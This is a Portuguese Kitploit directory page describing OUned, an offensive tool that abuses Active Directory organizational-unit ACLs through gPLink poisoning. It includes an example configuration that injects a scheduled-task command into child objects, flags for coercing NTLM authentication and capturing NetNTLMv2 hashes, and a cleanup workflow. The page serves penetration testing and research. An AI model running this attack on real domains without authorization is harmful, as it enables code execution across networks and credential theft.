Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
OUned — O projeto OUned automatizando a exploração de ACL de Unidades Organizacionais do Active Directory através de envenenamento gPLink | Kitploit
Ferramentas/GitHubGitHub/synacktiv/ouned
Escalada de PrivilégiosExploraçãoMovimento LateralTestes de PenetraçãoAutenticaçãoConfiguração Incorreta
GitHubsynacktiv/ouned

OUned

O projeto OUned automatizando a exploração de ACL de Unidades Organizacionais do Active Directory através de envenenamento gPLink

Ver Repositório
161142há 12 diasRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

OUned

O projeto OUned, uma ferramenta de exploração que automatiza o abuso de ACLs de Unidades Organizacionais (OU) por meio da manipulação do gPLink.

Para uma explicação detalhada sobre o princípio por trás do ataque, a configuração necessária e como usar a ferramenta, consulte o artigo associado: https://www.synacktiv.com/publications/ounedpy-exploiting-hidden-organizational-units-acl-attack-vectors-in-active-directory

Instalação

A instalação pode ser realizada clonando o repositório e instalando as dependências:

root@kitploit:~
$ git clone https://github.com/synacktiv/OUned
$ python3 -m pip install -r requirements.txt

Arquivo de configuração

Os argumentos do OUned são fornecidos por meio de um arquivo de configuração - um arquivo de exemplo é fornecido no repositório, config.example.ini.

Cada entrada é descrita por um comentário, mas para instruções detalhadas de configuração, consulte o artigo mencionado na introdução acima.

root@kitploit:~
[GENERAL]
# The target domain name
domain=corp.com

# The target DC. If not specified, defaults to the domain name
#dc=192.168.123.10

# The Distinguished Name of the target container
containerDN=OU=SERVERS,DC=corp,DC=com

# The username and password of the user having write permissions on the gPLink attribute of the target container
username=naugustine
password=Password1

# The IP address of the attacker machine on the internal network
attacker_ip=192.168.123.16

# The command that should be executed by child objects. Specifying a command will inject an immediate Scheduled Task
command=whoami > C:\poc.txt
# Alternatively to the 'command' option, you can provide a module file with the GroupPolicyBackdoor syntax - see https://github.com/synacktiv/GroupPolicyBackdoor/wiki. 'Command' and 'module' are mutually exclusive
# module=Scheduledtask_add_computer.ini

# The kind of objects targeted ("computer" or "user")
target_type=computer


[LDAP]
# The IP address of the dummy domain controller that will act as an LDAP server
ldap_ip=192.168.125.245

# Optional (used for sanity checks) - the hostname of the dummy domain controller
ldap_hostname=WIN-TTEBC5VH747

# The username and password of a domain administrator on the dummy domain controller 
ldap_username=ldapadm
ldap_password=Password1!

# The ID of the GPO (can be empty, only needs to exist) on the dummy domain controller
gpo_id=7B7D6B23-26F8-4E4B-AF23-F9B9005167F6

# The machine account name and password on the target domain that will be used to fake the LDAP server delivering the GPC
ldap_machine_name=OUNED$
ldap_machine_password=some_very_long_random_password

[SMB]
# The SMB mode can be embedded or forwarded depending on the kind of object targeted
smb_mode=embedded

# The name of the SMB share. Can be anything for embedded mode, should match an existing share on SMB dummy domain controller for forwarded mode
share_name=synacktiv

# The IP address of the dummy domain controller that will act as a SMB server. Only useful in forwarded mode
#smb_ip=192.168.126.206

# The username and password of a user having write access to the share on the SMB dummy domain controller. Only useful in forwarded mode
#smb_username=smbadm
#smb_password=Password1!

# The machine account name and password on the target domain that will be used to fake the SMB server delivering the GPT. Only useful in forwarded mode
#smb_machine_name=OUNED2$
#smb_machine_password=some_very_long_random_password

Uso do OUned

O único argumento obrigatório ao executar o OUned é a flag --config, que indica o caminho para o arquivo de configuração.

As flags --just-coerce e coerce-to são usadas para o modo de coerção de autenticação SMB, no qual o OUned forçará a autenticação SMB de objetos filhos de OU para o destino especificado - para mais detalhes, consulte o artigo referenciado na introdução.

Em relação à flag --just-clean, veja a próxima seção.

root@kitploit:~
python3 OUned.py --help
                                                                                                                                                                                    
 Usage: OUned.py [OPTIONS]                                                                                                                                                          
                                                                                                                                                                                    
╭─ Options ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╮
│ *  --config               TEXT  The configuration file for OUned [default: None] [required]                                                                                      │
│    --skip-checks                Do not perform the various checks related to the exploitation setup                                                                              │
│    --just-coerce                Only coerce SMB NTLM authentication of OU child objects to the destination specified in the --coerce-to flag, or, if no destination is           │
│                                 specified, to a local SMB server that will print their NetNTLMv2 hashes                                                                          │
│    --coerce-to            TEXT  Coerce child objects SMB NTLM authentication to a specific destination - this argument should be an IP address [default: None]                   │
│    --just-clean                 This flag indicates that OUned should only perform cleaning actions from specified cleaning-file                                                 │
│    --cleaning-file        TEXT  The path to the cleaning file in case the --just-clean flag is used [default: None]                                                              │
│    --verbose                    Enable verbose output                                                                                                                            │
│    --help                       Show this message and exit.                                                                                                                      │
╰──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╯

Sobre a limpeza

Por padrão, e conforme explicado no artigo, o OUned realizará ações de limpeza e, entre outras, restaurará o valor original do gPLink no domínio alvo. Caso o exploit não consiga ser encerrado corretamente, o OUned cria um arquivo de limpeza a cada execução do exploit, que pode ser usado posteriormente para restaurar valores legítimos usando a flag --just-clean; por exemplo:

root@kitploit:~
$ python3 OUned.py --config config.example.ini --just-clean --cleaning-file cleaning/FINANCE/2024_04_14-05_02_46.txt
Baixar ferramenta